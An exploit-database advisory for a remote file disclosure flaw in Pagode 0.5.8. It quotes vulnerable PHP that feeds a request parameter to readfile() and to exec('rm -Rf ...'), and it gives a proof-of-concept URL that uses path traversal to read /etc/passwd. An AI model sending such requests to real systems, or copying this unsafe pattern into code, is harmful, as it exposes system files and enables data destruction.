Pagode 0.5.8 - 'navigator_ok.php?asolute' Remote File Disclosure
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-04-22
date_updated: 2016-09-30
verified: 1
codes: OSVDB-35312;CVE-2007-2200;OSVDB-35311
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.compagode-0.5.8.tar.gz
# Pagode 0.5.8(navigator_ok.php asolute)Remote File Disclosure
# D.Script:http://belnet.dl.sourceforge.net/sourceforge/pagode/pagode-0.5.8.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code In /navigator/navigator_ok.php:
###################/navigator/navigator_ok.php###################
# <?
# session_cache_limiter('none');
# session_start();
# include ('../includes/functions.php');
#
# header("Content-Type: application/save-as");
# header("Content-Length: $file_size");
# header("Content-Disposition: attachment; filename=$file_name");
# header("Content-Transfer-Encoding: binary");
# readfile($asolute); <----[+]
# exec("rm -Rf $asolute");
# ?>
#################################################################
# Exploit:[Path_Pagode]/navigator/navigator_ok.php?asolute=../../../../../../etc/passwd
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & 020
# milw0rm.com [2007-04-23]